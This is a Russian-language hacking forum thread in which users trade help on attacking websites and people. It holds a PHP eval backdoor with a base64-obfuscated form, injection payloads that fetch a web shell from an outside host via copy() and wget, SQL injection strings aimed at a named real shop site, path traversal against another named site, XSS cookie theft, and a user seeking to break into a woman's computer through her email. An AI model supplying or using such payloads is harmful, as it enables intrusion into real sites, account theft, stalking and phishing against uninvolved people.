Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Делаю так
    http://localhost/x.php?b=phpinfo(); показывает
    http://localhost/x.php?b=ls не показывает
    allow_url_fopen On
    magic_quotes_gpc On
    Но при http://localhost/x.php?b=eval(file_get_contents('http://blalba/shell.txt'));
    пустой экран.
    Попробывал <? eval(file_get_contents($_GET['e'])); ?>
    http://localhost/x.php?e=http://blabla/shell.txt
    пустой экран.
    Уже заканчивается фантазия ... Может есть еще идеи?
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    b=phpinfo();
    b=ls

    чот не понял, :D что за универсальная функция у тебя там?

    покажи код бекдора
     
    _________________________
  3. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    if (isset($_REQUEST['b'])) eval(stripslashes($_REQUEST['b']));
    <?eval(base64_decode('YXNzZXJ0KHN0cmlwc2xhc2hlcygkX 1JFUVVFU1RbYl0pKTs=')); ?>
    по поводу ls погорячился, точнее курю мануалы и понимаю что сглупил... а если еще точнее не обьявил системную ...
     
    #16523 Lijzer, 4 Apr 2011
    Last edited: 4 Apr 2011
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    b=copy('http://site.com/shell.txt','shell.php');
    b=eval(base64_decode('Y29weSgnaHR0cDovL3NpdGUuY29tL3NoZWxsLnR4dCcsJ3NoZWxsLnBocCcpOw=='));
    -----------
    b=system('wget http://site.com/shell.php');
    b=eval(base64_decode('c3lzdGVtKCd3Z2V0IGh0dHA6Ly9zaXRlLmNvbS9zaGVsbC5waHAnKTs='));

    вариантов много, если хотите залить шелл пробуйте эти для примера, смените урл на нормальный линк к шеллу
     
    _________________________
  5. Flashmx

    Flashmx New Member

    Joined:
    27 Apr 2010
    Messages:
    25
    Likes Received:
    4
    Reputations:
    5
    Помогите раскрутить
    http://www.lazyjack.co.jp/cp-bin/webstore/catalog/product_info.php/products_id/1647'
    pls
     
  6. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    http://www.lazyjack.co.jp/cp-bin/webstore/catalog/product_info.php/products_id/1647' or 1 group by concat(version(),floor(rand(0)*2)) having max(0) or 1-- 1
     
  7. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    http://meb[G00GLE]el-dvs.ru/main_p3.php?&d=mebelionika&nmr=2&nmr2=3&im=../../../../../../boot.ini%00&rzd=&nmstr=495&sn=&content=%CC%E5%E1%E5%EB%FC%ED%E0%FF%20%F4%E0%E1%F0%E8%EA%E0%20%CC%E5%E1%E5%EB%E8%EE%ED%E8%EA%E0&content2=catalog_mebelionika

    Что-то можно вообще сделать? Забавный сайт какой-то.
     
    _________________________
  8. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Тут LFI
    достаточно и этого
    Но ты там не найдешь boot.ini, потому что этот сайт не на диске C(загрузочном) находится, по-ходу можно читать файлы на диске D, но вряд ли там есть что-то полезное :rolleyes:
     
    1 person likes this.
  9. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Там Open_basedir ограничивает, там даже пути даны, так что в топку походу.
     
    _________________________
  10. Pbz

    Pbz New Member

    Joined:
    25 Aug 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Знаю ip жертвы, открытые порты 21 / tcp ftp, 22 / tcp ssh, 23 / tcp telnet, 80 / tcp http, 1863 / tcp - msnp, 1864 / tcp - paradym-31port, 5190 - про этот порт не знаю.
    есть доступ к почте жертвы.
    конекчусь с помощью putty через ssh или telnet port и получаю epic fail :(
    возможно у жертвы стоит галочка в удаленном помощнике - проверил что-то не получается зайти.
    Цель проникнуть на комп, получить доступ, опыта нет подскажите идеи что можно придумать.
     
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Фаервол может делать "epic fail".
    Так же у жертвы может быть динамический IP. И вообще странное что у юзера открыты эти порты, может это роутер? =\
     
  12. Pbz

    Pbz New Member

    Joined:
    25 Aug 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Да роутер вроде есть, кстати по ssh сразу кричит epic fail, а вот через telnet вроде заходит, в настройках не указывал под каким именем зайти, но тоже тишина, не вижу строчки ввести логин бла бла бла.
    Может через почтовый ящик что-то замутить можно? доступ есть, проблема вся в том какое письмецо прислать и что стырить, чтобы получить доступ.
    p.s. жертва - девушка.
     
  13. LiRvD082

    LiRvD082 Member

    Joined:
    4 Oct 2009
    Messages:
    44
    Likes Received:
    16
    Reputations:
    5
    id=1'+group+by+DocSrc,name_doc+having+'1'='1'--
    выдает
    id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

    Посоветуйте пожалуйсто решение
     
  14. White Bear

    White Bear New Member

    Joined:
    3 Apr 2011
    Messages:
    10
    Likes Received:
    4
    Reputations:
    0
    Вопрос насчет xss
    Есть сайт на нем уязвим модуль search
    Используется уязвимость вот такая
    Когда сниффаю получаю лог такого вида
    Code:
    cnd__lastvisit=1302335876; cnd__lastactivity=0; IDstack=,56445,; vbseo_loggedin=yes; __utma=89779204.1220064702.1302335873.1302335873.1302335873.1; __utmb=89779204.2.10.1302335873; __utmc=89779204; __utmz=89779204.1302335873.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nugg_frequencyCapping=2
    Как я выяснил ultm* это Google аналитик
    А сама сессия храниться в cnd__sessionhash
    И она не приходит
    Что можно сделать в этом случае
     
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,518
    Likes Received:
    401
    Reputations:
    196

    Куки имеют флаг HTTPOnly, наверное
     
  16. Pbz

    Pbz New Member

    Joined:
    25 Aug 2010
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    помогите пожалуйста
     
  17. White Bear

    White Bear New Member

    Joined:
    3 Apr 2011
    Messages:
    10
    Likes Received:
    4
    Reputations:
    0
    И как нибудь возможно обойти их?
     
  18. gr[e]y

    gr[e]y New Member

    Joined:
    12 May 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Есть php-скрипт. У него вверху задаётся:
    PHP:
    $setup['param_login']='login';
    $setup['param_pw']='pass';

    и в теле используются заданные выше данные:
    PHP:
    function AddLinkPost() {
    global 
    $setup;
    $pw GetParametr('pw''post');
    $login GetParametr('login''post');
    $linkdata GoodVal(GetParametr('linkdata''post'));
    if( (
    $login != $setup['param_login']) or ($pw != $setup['param_pw']) ){
    echo 
    'strbeg'.'errorlogin'.'strend';
    exit;
    }
    // Далее пошёл код
    Вот меня интересует можно как-то обойти проверку соответствия логина и пароля?

    Выкладываю полную версию скрипта:
    PHP:
    <?php
    error_reporting
    (0);
    $setup['param_login']='mylogin';
    $setup['param_pw']='mypass';
    $addlink=GetParametr('addlink','post');
    if (
    $addlink==1AddLinkPost();
    $dellink=GetParametr('dellink','post');
    if (
    $dellink==1DelLinkPost();

    FindLink();

    function 
    file_put_contentz($file,$content) {
    $h=fopen($file,'wb');
    fwrite($h,$content,strlen($content));
    fclose($h);
    }

    exit;

    function 
    FindLink()
    {
    global 
    $setup;
    $id=GetParametr('id','get');
    $linkdata=file_get_contents("base/{$id}.txt");
    echo 
    Tmpl($linkdata,'template.html');
    }

    function 
    DelLinkPost()
    {
    global 
    $setup;
    $pw=GetParametr('pw','post');
    $login=GetParametr('login','post');
    if ((
    $login!=$setup['param_login'])or($pw!=$setup['param_pw']))
    {
    echo 
    'strbeg'.'errorlogin'.'strend';
    exit;
    }
    echo 
    'strbeg'.'Deleted!'.'strend';
    exit;
    }

    function 
    AddLinkPost() {
    global 
    $setup;
    $pw GetParametr('pw''post');
    $login GetParametr('login''post');
    $linkdata GoodVal(GetParametr('linkdata''post'));
    if( (
    $login != $setup['param_login']) or ($pw != $setup['param_pw']) ){
    echo 
    'strbeg'.'errorlogin'.'strend';
    exit;
    }
    $last=file_get_contents("base/last.txt");
    $last = isset($last) ? intval($last) : 0;
    $last++;
    file_put_contentz("base/last.txt"$last);
    file_put_contentz("base/{$last}.txt"$linkdata);
    echo 
    'strbeg'.$last.'strend';
    exit;
    }

    function 
    GetParametr($name,$type)
    {
    global 
    $HTTP_GET_VARS,$HTTP_POST_VARS;
    if (
    $type=='get'$from=$_GET;
    if (
    $type=='post'$from=$_POST;
    $par=-1;
    while (list(
    $key,$val)=each($from))
    {
    if (
    $key==$name) {$par=$val;}
    }
    return 
    $par;
    }

    function 
    Tmpl($linkdata,$filename)
    {
    $fd fopen$filename"r" );
    $data fread$fdfilesize$filename ) );
    fclose$fd );
    $data=str_replace('!linkdata!',$linkdata,$data);
    return 
    $data;
    }

    function 
    GoodVal($str)
    {
    $str=str_replace('\"','"',$str);
    return 
    str_replace("\'","'",$str);
    }

    ?>
    По не подтверждённым данным этот скрипт уже был взломан, вот только как?
     
  19. gr[e]y

    gr[e]y New Member

    Joined:
    12 May 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    подбирать их? всмысле наугад?
    запросов в БД никаких, работа только с текстовыми файлами.

    другие варанты?
     
  20. gr[e]y

    gr[e]y New Member

    Joined:
    12 May 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    мне через него фейк пайпала залили на сайт...!
     
Thread Status:
Not open for further replies.